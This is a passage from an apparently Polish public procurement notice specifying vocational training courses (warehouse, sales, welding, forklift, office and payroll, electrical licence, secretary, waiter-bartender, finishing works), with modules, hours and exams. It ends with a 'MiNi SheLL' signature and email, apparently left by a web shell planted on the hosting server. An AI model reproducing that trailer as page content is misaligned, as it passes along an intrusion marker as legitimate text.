1) przepisy bhp i p.poż w magazynie - hurtowni - minimum 7 godzin, zawierająca następujące jednostki                	szkoleniowe:
- bezpieczeństwo i higiena pracy w jednostce handlowej;
- bhp przy transporcie ręcznym i mechanicznym; 
- bhp przy urządzeniach elektrycznych; 
- ochrona przeciwpożarowa; 
- udzielanie pierwszej pomocy na miejscu wypadku; 
- udzielanie pierwszej pomocy przy oparzeniach, odmrożeniach, zatruciach. 
2) odbiór towarów- minimum 18 godzin, zawierająca następujące jednostki szkoleniowe:
- odpowiedzialność materialna pracownika magazynowego;
- dokumentacja organizacji magazynu; 
- sposoby rozmieszczenia towarów w magazynie;
- proces magazynowy w magazynach kompletacyjnych;
- systemy kompletacji;
- znakowanie ładunków kodami kreskowymi;
- odbiór ilościowy i jakościowy;
- gospodarka opakowaniami w magazynach.
3) zasady poprawnego przechowywania towarów - minimum 13 godzin, zawierająca następujące                		 jednostki szkoleniowe:
- zasady właściwego przechowywania towarów;
-  instalacje w budynkach magazynowych; 
- urządzenia do składowania;
- magazynowe środki transportu;
- pomocnicze urządzenia magazynowe; 
- czynniki wpływające na przechowywanie towarów;
- zmiany zachodzące w przechowywanych towarach;
- szkodniki magazynowe;
- ubytki towarowe.
4) obsługa programu SUBIEKT  dla WINDOWS do prowadzenia gospodarki magazynowej - minimum 	30 godzin, zawierająca następujące jednostki szkoleniowe:
- konfiguracja programu;
- sporządzanie dokumentów zakupu, zamówień do dostawcy i rozliczanie zobowiązań finansowych;
- sporządzanie dokumentów sprzedaży, zamówień od klienta i rozliczanie należności finansowych; 
- sporządzanie dokumentów korygujących zakupu i sprzedaży; 
-sporządzanie dokumentów przyjęcia magazynowe, wydania magazynowe, przesunięcia                                       	między magazynowe;
- przeprowadzanie inwentaryzacji; 
- budowa i obsługa drukarki fiskalnej; 
- drukowanie raportów.
2. jednostkę modułową: obsługa kasy fiskalnej  i terminali płatniczych - minimum 10 godzin,
3. jednostkę modułową: podstawowe zasady higieny - minimum 10 godzin,
4. jednostkę modułową: obsługa wózków jezdniowych wraz z wymianą butli gazowych- minimum                 	67 godzin,
5. jednostkę modułową: nowoczesne techniki sprzedaży- minimum 10 godzin,
6.jednostkę modułową: obsługa programu SYMFONIA w zakresie gospodarki magazynowej 
- minimum 25 godzin.
Dodatkowe wymagania: Część szkolenia dotycząca obsługi wózka jezdniowego ma przygotować uczestników do samodzielnego prowadzenia i obsługi wózka w transporcie wewnątrzzakładowym oraz powinna być przeprowadzona w oparciu o program opracowany lub zatwierdzony przez jednostkę      organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie                                   z  Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 70, poz. 650 z późn. zm) lub równoważny.
W ramach szkolenia Wykonawca zorganizuje i przeprowadzi egzamin przed Komisją Urzędu Dozoru                          Technicznego. Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia. Każdy uczestnik                    szkolenia powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3. 5 SIWZ oraz zaświadczenie                    kwalifikacyjne wydane przez Urząd Dozoru Technicznego.
Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie                            z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II. Zakres Sprzedawca-  10 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni.
Program szkolenia: minimalna ilość godzin -180, w tym minimum  120 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: sprzedawca, z zakresu: pracownik działu sprzedaży (kod zawodu: 522107) z następującymi jednostkami modułowymi: 
1) przestrzeganie zasad bezpieczeństwa i higieny pracy w jednostce handlowej - minimum 6 godzin,   zawierająca następujące jednostki szkoleniowe:
- poznaje ogólne przepisy bhp obowiązujące w jednostce handlowej;
- udzielanie pierwszej pomocy w miejscu wypadku.
2) organizacja handlu w gospodarce rynkowej - minimum 30 godzin, zawierająca następujące jednostki szkoleniowe:
- zapoznanie z podstawowymi pojęciami obowiązującymi w jednostce handlowej;
- podejmowanie działalności gospodarczej; 
- poznawanie otoczenia przedsiębiorstwa handlowego;
- marketing i reklama w handlu detalicznym.
3) wyposażenie punktu sprzedaży detalicznej - minimum 18 godzin, zawierająca następujące jednostki szkoleniowe:
- rodzaje punktów sprzedaży i ich charakterystyka;
- wyposażanie punktu sprzedaży detalicznej.
4) organizacja zaopatrzenia i przyjmowanie dostaw towarów - minimum 20 godzin, zawierająca następujące jednostki szkoleniowe:
- zaopatrzenie i zakup towarów w jednostce handlu detalicznego;
- organizacja gospodarki magazynowej;
- rozmieszczanie i przechowywanie towarów w jednostkach handlu detalicznego.
5) wykonywanie i dokumentowanie podstawowych obliczeń sklepowych - minimum 25 godzin, zawierająca następujące jednostki szkoleniowe:
- obliczenia sklepowe;
- kształtowanie cen w jednostkach sprzedaży;
- inkasowanie należności za sprzedane produkty;
- wypełnianie dokumentacji związanej ze sprzedażą.
6) obsługiwanie klienta, przebieg sprzedaży detalicznej- minimum 12 godzin, zawierająca następujące jednostki szkoleniowe:
- obsługiwanie klienta z wykorzystaniem aktywnych metod sprzedaży;
- zawieranie transakcji sprzedaży;
- dekorowanie wnętrza sklepu i okna wystawowego.
2. jednostkę modułową: obsługa kasy fiskalnej i terminali płatniczych - minimum  15 godzin,
3. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
4. jednostkę modułową: obsługa programu SUBIEKT dla WINDOWS do prowadzenia gospodarki magazynowej - 	minimum  30 godzin,
5. jednostkę modułową: nowoczesne techniki sprzedaży- minimum 7 godzin;
6. jednostkę modułową: sprzedaż internetowa- minimum 7 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> III. Zakres: Kurs spawania blach i rur  spoinami  pachwinowymi - proces spawania 135 oraz proces spawania 141 - 5 osób w jednej edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 7 tygodni.
Program szkolenia: Program szkolenia powinien obejmować minimum 240 godzin, w tym minimum 30 godzin teorii oraz minimum 210 godzin zajęć praktycznych (z zakresu spawania metodą MAG i TIG). Program szkolenia powinien zostać opracowany zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach oraz powinien uwzględniać przepisy Rozporządzenia Ministra Gospodarki z dnia 27 kwietnia 2000r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. Nr 40 poz. 470).
Dodatkowe wymagania: Każdy uczestnik szkolenia, który ukończy szkolenie powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3.5 SIWZ, książkę spawacza oraz świadectwo egzaminu spawacza wydane przez Instytut Spawalnictwa w Gliwicach. Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia. Wykonawca dla każdego uczestnika szkolenia zapewni odzież roboczą (ochronną) tj. minimum: obuwie, fartuch, rękawice, okulary..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> IV. Zakres: Operator - kierowca wózka jezdniowego wraz wymianą butli gazowych oraz                         egzaminem UDT - 15 osób w dwóch edycjach,  (7-8 osób w jednej edycji).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 2 tygodnie. 
Program szkolenia: minimalna ilość godzin - 67, w tym minimum  21 godzin ćwiczeń. Szkolenie ma przygotować uczestników do samodzielnego prowadzenia i obsługi wózka w transporcie wewnątrzzakładowym oraz powinno być przeprowadzone w oparciu o program opracowany lub zatwierdzony przez jednostkę organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 70, poz. 650 z późn. zm) lub równoważny.
Dodatkowe wymagania: W ramach szkolenia Wykonawca zorganizuje i przeprowadzi egzamin przed Komisją Urzędu Dozoru Technicznego. Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia. Każdy uczestnik szkolenia powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3.5 SIWZ oraz zaświadczenie kwalifikacyjne wydane przez Urząd Dozoru Technicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> V. Zakres: Pracownik administracyjno- biurowy z elementami kadr i płac - 5 osób w jednej edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni. 
Program szkolenia: minimalna ilość godzin- 200, w tym minimum  140 godzin ćwiczeń. 
1. Program szkolenia powinien być dostosowany do standardów kwalifikacji zawodowych dla zawodu : pracownik administracyjny (kod zawodu: 343101) i pracownik biurowy (kod zawodu:419101) oraz musi zawierać następujące jednostki modułowe: 
1) organizowanie pracy własnej zgodnie z zasadami ergonomii, bezpieczeństwa i higieny pracy, 	ochrony przeciwpożarowej i ochrony środowiska 
2) organizowanie pracy własnej na stanowisku technika administracji, usprawnianie pracy oraz 
    doskonalenie osobistych kompetencji,
3) organizowanie spotkań, z kontrahentami, pracownikami i klientami oraz innych prac związanych 
z funkcjonowaniem przedsiębiorstwa,
4) przyjmowanie i obsługiwanie interesantów,
5) wykonywanie prac administracyjnych związanych z ogólną działalnością jednostki organizacyjnej,
6) zapewnianie przepływu informacji i dokumentów wewnątrz i na zewnątrz organizacji,
7) sporządzanie dokumentacji prawnej oraz dokumentacji spraw pracowniczych związanej 
			z działalnością jednostki organizacyjnej,
8) przygotowywanie i udostępnianie dokumentacji do kontroli,
9) redagowanie korespondencji biurowej w języku polskim,
10) sporządzanie umów, dokumentacji spraw kancelaryjno - biurowych, pracowniczej oraz 
	finansowej związanej z działalnością jednostki gospodarczej,
11) przechowywanie i archiwizowanie informacji, dokumentów oraz akt spraw,
12)gromadzenie i wykorzystywanie informacji ekonomicznych i statystycznych w pracy pracownika                              	administracyjnego,
13) tworzenie i prowadzenie bazy danych kontrahentów,
14) stosowanie przepisów prawa w pracy zawodowej,
15) wykonywanie prac biurowych,
16) współpraca z innymi komórkami organizacyjnymi jednostki,
17) współpraca z otoczeniem zewnętrznym jednostki organizacyjnej,
18) kierowanie zespołem pracowników administracyjno - biurowych,
19) ocenianie jakości i efektywności własnych działań zawodowych,
20) obsługa komputera (edytor tekstów, arkusz kalkulacyjny, bazy danych, program do prezentacji                                    		multimedialnych, poczta elektroniczna, Internet),
21) obsługa urządzeń biurowych
2. zgodnie z modułowym programem szkolenia zawodowego dla zawodu: księgowy, z zakresu: 
	księgowy ds. płac i rozliczeń z ZUS (kod zawodu: 343201):  
1) wynagrodzenie za pracę - minimum 6 godzin  zawierająca następujące jednostki szkoleniowe:
- płaca - jej funkcje i zasady;
- elementy i składniki wynagrodzenia za pracę; 
- minimalne wynagrodzenie za pracę;
- systemy wynagrodzenia za pracę ; 
- wzorcowa lista płac;  
2) ochrona wynagrodzenia za pracę i obowiązki pracodawców - minimum 6 godzin  zawierająca na	stępujące jednostki szkoleniowe
- prawo do wynagrodzenia
        - ochrona wynagrodzenia za pracę
        - potrącenia z wynagrodzenia za pracę
        - wgląd do dokumentacji płacowej
        - rozliczenia publicznoprawne
odpowiedzialność pracodawcy przy wypłacie wynagrodzeń
3) rozliczenie składek ZUS - minimum 6 godzin  zawierająca następujące jednostki szkoleniowe
          - dokumenty zgłoszeniowe, rozliczeniowe i płatnicze
       - zasady i tryb postępowania w sprawach rozliczenia składek 
- wypełnianie i przekazywanie dokumentów ubezpieczeniowych 
4) zasiłki z ubezpieczenia społecznego - minimum 6 godziny zawierająca następujące jednostki 	szkoleniowe
      - zasiłek chorobowy i opiekuńczy 
      - świadczenia rehabilitacyjne 
      - zasiłek macierzyński 
 - zasiłki rodzinne, pielęgnacyjne i wychowawcze 
5) kompletowanie wniosków o emerytury i renty oraz ustalenie kapitału początkowego - minimum
 6 godzin zawierająca następujące jednostki szkoleniowe
       - kapitał początkowy - jego istota i zadania 
        - wniosek ZUS do pracodawców w sprawie kapitału początkowego 
        - kompletowanie dokumentów do wniosku o ustalenie kapitału początkowego
        -ustalenie kapitału początkowego 
3.  jednostkę modułową: zagadnienia z zakresu kadr, w tym elementy związane z prawem pracy -        	minimum 20 godzin;
4.   jednostkę modułową: obsługa programu PŁATNIK- minimum 15 godzin;
5.   jednostkę modułową: obsługa programu SYMFONIA w zakresie kadr i płac - minimum 15 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę z zakresu prac biurowych oraz kadr i płac..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> VI. Zakres: Uprawnienia SEP do 1 kV - 5 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 2 tygodnie.
Program szkolenia: minimalna ilość godzin- 60. Program szkolenia musi być zgodny z przepisami
rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją 
urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828 z późn. zm.) i obwieszczenia Prezesa Rady Ministrów z dnia 02 lipca 2003r. o sprostowaniu błędów (Dz. U. Nr 129, poz. 1184) oraz rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych
zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci ( Dz. U. Nr 141, poz. 1189) oraz zawierać m.in.:
1) zasady budowy, działania oraz warunków technicznych obsługi urządzeń, instalacji i sieci,
2) zasady eksploatacji oraz instrukcji eksploatacji urządzeń, instalacji i sieci,
3) zasady i warunki wykonywania prac kontrolno - pomiarowych i montażowych,
4) zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz umiejętności 	udzielania pierwszej pomocy,
5) instrukcję postępowania w razie awarii, pożaru lub innego zagrożenia bezpieczeństwa obsługi urządzeń lub zagrożenia życia, zdrowia i środowiska.
Dodatkowe wymagania: Szkolenie powinno zakończyć się egzaminem zewnętrznym przed Komisją powołaną przez Urząd Regulacji Energetyki. Każdy uczestnik szkolenia powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3.5 SIWZ oraz świadectwo kwalifikacyjne w grupie materiałowej G-1E zgodnie z wzorem świadectwa kwalifikacyjnego, stanowiącym załącznik do rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci (Dz. U. Nr 141 poz. 1189). Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> VII. Zakres: Sekretarka - 5 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni. 
Program szkolenia: minimalna ilość godzin- 200, w tym minimum  140 godzin ćwiczeń. 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: sekretarka, z zakresu:  asystentka szefa (kod zawodu: 411101) z następującymi jednostkami modułowymi: 
1) Wykazywanie kultury osobistej
- normy etyczne i porządkowe w miejscu pracy;
- reguły obyczajowe w pracy;
- zasada savoir -vivre,
- konflikty w pracy i sposoby ich rozwiązywania
2) Utrzymywanie wyglądu i prezencji osobistej:
- zasady prawidłowego odżywiania się;
- gimnastyka jako podstawa dobrej kondycji psychofizycznej;
- prawidłowa postawa i sposób poruszania się;
- dostosowanie stylu ubioru do kanonów mody obowiązujących w biurze;
- pielęgnacja skóry, ciała i rąk;
- pielęgnacja włosów;
3) Organizacja i utrzymywanie estetyki sekretariatu i gabinetu szefa:
- urządzanie sekretariatu i gabinetu szefa;
- organizacja pracy sekretariatu;
- estetyka sekretariatu i gabinetu szefa
4) Organizacja pracy biurowej:
- struktura organizacyjna zakładu pracy;
- istota i obieg informacji;
- zasady prowadzenia terminarza;
- ochrona czasu pracy szefa;
- czynności kancelaryjne - korespondencja przychodząca;
-systemy kancelaryjne i obieg korespondencji;
- czynności kancelaryjne korespondencja wychodząca ;
- przechowywanie akt;
5) Organizacja biura pod względem bhp i ppoż.:
- przepisy bhp;
- ochrona przeciwpożarowa;
- zasady udzielania pierwszej pomocy;
6) Sporządzanie korespondencji w sprawach handlowych, osobowych i administracyjnych:
- rodzaje pism;
- zasady sporządzania pism;
- pisma i dokumenty w sprawach osobowych;
- pisma i dokumenty w sprawach administracyjnych;
-pisma i dokumenty w sprawach handlowych;
- protokoły, sprawozdania, notatki służbowe;
7) Obsługa środków łączności:
- korzystanie z telefonu i automatycznej sekretarki;
- korzystanie z telefonu komórkowego;
- korzystanie z faksu;
- nagrywanie i odtwarzanie dyktafonem; 
8) Obsługa biurowych środków technicznych:
- użytkowanie telewizora;
- użytkowanie magnetowidu;
- projekcja rzutnikiem pisma;
- kopiowanie dokumentów;
9) Obsługa interesantów:
- prowadzenie rozmów telefonicznych;
- interesant w sekretariacie;
- notatka służbowa;
10) Organizacja podróży i spotkań:
- formy i zasady sporządzania zaproszeń;
- przygotowanie sali obrad i niezbędnych materiałów;
- przygotowanie materiałów do podróży
- rezerwacja zakwaterowania i wyżywienia;
- opracowanie scenariusza wizyty;
- wybór i forma przekazania drobnych upominków dla gości;
- organizacja przyjęć;
- przygotowanie i obsługa stołu bankietowego;
11) Obsługa komputera w zakresie podstawowym:
- operacja na dyskach;
- operacja na katalogach;
- operacja na plikach;
- zarządzanie plikami w Windows;
- praca z aplikacjami i przenoszenie obiektów w Windows;
- drukowanie dokumentów ze środowiska Windows;
12) Korzystanie z komputerowych programów gromadzenia i przetwarzania danych;
- zasady budowania bez danych i projektowanie struktur bez danych przy użyciu kreatorów;
- terminarze komputerowe ich tworzenie i wykorzystanie;
- książka telefoniczna i wykorzystanie jej danych w komunikacji komputerowej;
- kartoteka osobowa i wykorzystanie jej danych w korespondencji seryjnej;
13) Edycja komputerowa dokumentów:
- podstawy pracy z edytorem tekstów;
- plan i układ strony redagowanego dokumentu;
- pisanie i edycja tekstu;
- formatowanie tekstu;
- szablony dokumentów;
- tworzenie korespondencji seryjnej;
- zachowanie otwieranie i drukowanie dokumentu;
14) Komunikacja komputerowa:
- rodzaje komunikacji komputerowej;
- praca w sieci lokalnej korzystanie z zasobów sieciowych;
- komunikacja pisemna online w sieci lokalnej;
- poczta elektroniczna w sieci lokalnej;
- wysyłanie faksów;
- odbiór i oglądanie przyjętych faksów;
- uzyskanie połączenia i wysyłanie informacji w sieci rozległej;
- korzystanie z serwisów informacyjnych i przyjmowanie informacji w sieci rozległej;
- suma godzin dla jednostek modułowych 1-10 - minimum 100 godzin
2. jednostka modułowa: bezwzrokowe pisanie na klawiaturze - minimum 30 godzin 
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> VIII. Zakres: Kelner-barman - 5 osób w jednej edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni.
Program szkolenia:  minimalna ilość godzin - 180, w tym minimum 150 godzin ćwiczeń, przy czym co najmniej 50% ćwiczeń powinno odbyć się na stanowisku pracy (w jednostce żywienia zbiorowego). 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: kelner, z zakresu: samodzielne wykonywanie zadań w sali konsumpcyjnej (kod zawodu: 512302) z następującymi jednostkami modułowymi:
1) przestrzeganie zasad bhp, p.poż. w sali konsumenckiej - zawierająca następujące jednostki szkoleniowe:
- znaczenie BHP w pracy kelnera;
2) wykazywanie kultury osobistej i przestrzeganie etyki zawodowej:
- posługiwanie się wyposażeniem służbowym;
- wizerunek zawodowy kelnera;
	3) wyposażenie i obsługa sprzętu kelnerskiego w części konsumenckiej i ekspedycyjnej:
	- układ funkcjonalny zakładu gastronomicznego;
	- zastosowanie urządzeń podgrzewczych, chłodniczych i transportowych;
- stosowanie drobnego  sprzętu do obsługi konsumenckiej
	4) przygotowanie poprzedzające obsługę:
- porządkowanie sali konsumenckiej;
- polerowanie i przechowywanie naczyń i sztućców;
5 ) przygotowanie sali konsumenckiej:
- przygotowanie sali konsumenckiej
- przygotowanie stołów konsumenckich i pomocniczych;
6) obsługiwanie w sali konsumenckiej:
- przyjmowanie zamówień i reklamacji;
- systemy obsługi w zakładach gastronomicznych;
7) noszenie zastawy:
- noszenie tac;
- przenoszenie talerzy i półmisków;
8) serwowanie potraw:
-  serwowanie zakąsek;
-  serwowanie zup;
-  serwowanie dań zasadniczych;
- serwowanie serów;
- zbieranie brudnych naczyń ze stołów;
- ogólne zasady obsługi konsumentów przy stole;
- ogólne metody serwowania;
9) wydawanie śniadań:
- przygotowanie bufetu śniadaniowego;
- nakrywanie i podawanie różnego rodzaju śniadań;
- przygotowanie śniadań z szampanem
10) przygotowanie potraw w obecności konsumenta:
- tranżerowanie mięsa przy konsumencie;
- serwowanie potraw płonących,
- filetowanie ryb w obecności konsumenta, 
11) serwowanie napojów bezalkoholowych zimnych i gorących:
- serwowanie kawy;
- serwowanie herbaty;
- serwowanie napojów zimnych;
12) serwowanie napojów alkoholowych:
- serwowanie win;
- serwowanie piwa;
- serwowanie wódek
13) organizacja przyjęć okolicznościowych:
- organizacja wstępna przyjęć okolicznościowych;
- przygotowanie i obsługa bankietu zasiadanego;
- przygotowanie i obsługa przyjęć typu angielskiego;
- organizacja i obsługa małych przyjęć; zjazdów oraz kongresów
14) obsługa gości hotelowych przez kelnera:
- obsługiwanie gości hotelowych na pietrach przez kelnera;
- wyposażenie room serwisu;
15) wystawianie rachunków:
- wystawianie rachunków;
- obsługa kasy kelnerskiej
- suma godzin dla jednostek modułowych 1-15 - minimum  70 godzin
2. modułowy program szkolenia zawodowego dla zawodu: bufetowy (barman) z zakresu: samodzielne 	wykonywanie zadań w bufecie  (kod zawodu: 512301) z następującymi jednostkami modułowymi:
1) przestrzeganie zasad bhp, p.poż. w bufecie:
- bezpieczeństwo pracy personelu w bufecie;
- higiena personelu w bufecie;
- higieniczne zasady produkcji, porcjowania i sprzedaży posiłków
2) przygotowanie bufetu do pracy:
- organizacja zaopatrzenia bufetowego;
- podstawowe wiadomości o środkach żywności;
- zasady jakościowego odbioru środków żywieniowych;
- zasady przechowywania surowców i produktów spożywczych;
3) przygotowanie bufetu  do obsługi:
- sporządzanie i utrzymanie czystości w bufecie;
- mycie naczyń stołowych, kuchennego sprzętu maszyn i urządzeń;
- polerowanie naczyń i sztućców;
- wykonywanie napisów cenowych i reklamowych w bufecie;
- eksponowanie artykułów żywnościowych w bufecie;
- zabezpieczenie bufetu po zakończeniu pracy;
4) sporządzanie kart menu:
- układanie jadłospisów bufetowych;
- ogólne wiadomości o żywieniu człowieka
- zasady opracowywania jadłospisów w zakładach gastronomicznych
5) sporządzanie deserów lodowych i owocowych:
- surowce do produkcji lodów i deserów;
- ocena jakościowa surowców do produkcji lodów i deserów;
- desery owocowe;
- lody, desery lodowe;
6) sporządzanie wybranych dań garmażeryjnych i barowych:
- ocena jakościowa i przechowywanie surowców i produktów spożywczych;
- dania garmażeryjne;
- dania barowe  oraz potrawy z rożna i grilla;
- podawanie, nakładanie, dekorowanie potraw garmażeryjnych i barowych;
- surowce i produkty do sporządzania dań garmażeryjnych i barowych;
- dodatki do potraw  garmażeryjnych i barowych;
- przyprawy do potraw;
- naczynia stołowe i sztućce do potraw
- urządzenia do przechowywania i podgrzewania dań garmażeryjnych i barowych.
7) przygotowanie coctaili:
- mieszanie coctailii;
- napoje coctailowe;
- dekorowanie coctailii;
- przybory i szkło barowe;
8) obsługa konsumenta przy bufecie:
- serwowanie zamówionych potraw i napojów;
- układanie indywidualnego menu;
- rozliczanie z konsumentem;
- przyjmowanie i załatwienie skarg i zażaleń
9) komunikowanie się z konsumentami:
- zasady etyki zawodowej barmana;
- dobór formy konwersacji do sytuacji;
- podstawowe wyrazy i zwroty w językach obcych;
10) planowanie i rozliczanie bufetu:
- planowanie oferty asortymentowej i napojów serwowanych w urzędzie;
- zamawianie artykułów, przyjmowanie dostaw;
- dokumentacja obrotów bufetowych;
11) kalkulowanie cen i rozliczenie finansowe bufetu:
- kalkulowanie cen potraw i napojów;
- dokumentacja finansowa w bufecie
12) zapewnienie jakości usług:
- projektowanie nowych form świadczonych usług;
- poszerzenie zakresu usług
- suma godzin dla jednostek modułowych 1-12 - minimum 60 godzin
3. jednostkę modułową: obsługa kasy fiskalnej i terminali płatniczych- minimum  10 godzin,
4. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
5. jednostkę modułową: zagadnienia z zakresu zawodu sommelier- minimum 15 godzin,
6. jednostkę modułową: zagadnienia z zakresu zawodu barista- minimum  15 godzin.
Dodatkowe wymagania: Wykonawca dla każdego uczestnika szkolenia zapewni odzież ochronną (roboczą) oraz zakupi  książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> IX. Zakres: Technolog robót wykończeniowych - 5 osób w jednej edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 8 tygodni.
Program szkolenia:  minimalna ilość godzin- 250, w tym minimum 210 godzin zajęć praktycznych na stanowisku pracy lub w innym miejscu umożliwiającym nabycie przez kursantów umiejętności praktycznych. Program szkolenia powinien być dostosowany do standardów kwalifikacji zawodowych dla zawodu: technolog robót wykończeniowych w budownictwie (kod zawodu: 713901) oraz musi zawierać następujące jednostki modułowe:
1) przepisy bhp i p.poż. obowiązujące na stanowisku pracy, 
2) określanie właściwości materiałów do robót wykończeniowych w celu ich właściwego 
	zastosowania, transportowania i składowania (materiałoznawstwo), 
3) przygotowywanie materiałów do robót wykończeniowych, 
4) organizowanie stanowiska pracy do wykonywania robót wykończeniowych,
5) wykonywanie robót malarskich,
6) wykonywanie wykończeniowych robót murarskich, 
7) wykonywanie robót tynkarskich, 
8) wykonywanie robót okładzinowych, 
9) wykonywanie dociepleń budynków, 
10) wykonywanie robót podłogowych, 
11) wykonywanie kalkulacji, kosztorysów robót, rozliczeń robocizny, materiałów sprzętu i maszyn, 
12) ocenianie jakości i poprawności wykonanej pracy,
13) nowoczesne technologie wykańczania wnętrz.
Dodatkowe wymagania: Wykonawca zapewni dla każdego uczestnika szkolenia materiały budowlane                              i wykończeniowe, sprzęt niezbędny do odbycia wszystkich zajęć praktycznych oraz odzież ochronną (roboczą)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com